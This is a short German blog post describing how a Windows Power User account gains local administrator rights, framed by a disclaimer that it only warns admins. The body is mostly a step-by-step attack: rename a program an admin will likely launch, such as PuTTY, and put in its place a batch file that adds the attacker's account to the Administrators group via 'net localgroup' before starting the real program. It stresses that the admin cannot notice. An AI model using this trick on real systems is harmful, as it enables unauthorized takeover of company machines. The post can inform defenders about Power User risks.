Nach Übernahme eines Hauptbenutzerkontos Adminrechte erlangen

Dies soll keine Anleitung zum Einbruch / Manipulation / Infiltration von Firmennetzen sein. Dies soll Administratoren nur die Gefahren von Hauptbenutzerkonnten aufzeigen!

Viele Firmen geben den Usern lokal den Status „Hauptbenutzer“ – das ist ein Userlevel, das nicht so viel darf wie ein lokaler Administrator, jedoch so viel darf, dass die User die Admins nicht ständig mit „doofen Anrufen“ belästigen. Die Sicherheit ist trügerisch!

Was ein Hauptbenutzer darf:

– Zugriff auf Systemdateien und Filesystem, insbesondere %program files% und %windir%
– Erstellung von neuen Usern und Gruppen, die er bis maximal auch zum Hauptbenutzer machen kann
– Nicht-administrative Freigaben löschen oder erstellen
– Dienste starten und stoppen, sofern sie nicht automatisch gestartet wurden
– Einige unwichtige Dinge wie Systemtime und Druckerfreigabenmanagement

Wie man sich mit einem Hauptbenutzerkonto Adminrechte verschafft:

Der Weg ist recht einfach, da in Firmennetzwerken oftmals mehrere User an einem PC arbeiten oder auch Administratoren auf die PCs zugreifen. Der Hauptbenutzer sucht sich ein Programm raus, das mit hoher Wahrscheinlichkeit gestartet wird, wenn ein User mit Adminrechten am PC angmeldet ist. Er sucht sich den Pfad zur .exe des Programmes das gestartet werden wird. Den Programmnamen benennt er um – Bsp: Putty.exe -> Putty_alt.exe. Anstelle der Putty.exe wird eine Batchdatei abgelegt, die den folgenden Inhalt hat:

net localgroup Administratoren MyUsername /add
Putty_alt.exe

Wenn er nun ein bisschen wartet, bis ein User mit administrativen Rechten die Puttyverknüpfung auf dem Desktop startet, wird Windows versuchen die Putty.exe zu starten. Diese gibt es nicht mehr, für dieses Problem versucht Windows nun schnell eine Lösung zu finden und den User nicht mit Rückfragen zu belästigen. Daher startet Windows automatisch die Putty.bat. Diese hebt das Securitylevel unseres Benutzers auf den Adminstatus und startet dann Putty. Der Admin hat keine Chance diese Machenschaft zu durchschauen. Selbst ein prüfen des Linkes wird ihn mit Verweis auf die Putty.exe in Sicherheit wiegen.

Nun da wir Adminstatus haben, ist Vollzugriff auf den Rechner gewährt.

  1. No trackbacks yet.

Du musst angemeldet sein, um einen Kommentar abzugeben.
%d Bloggern gefällt das: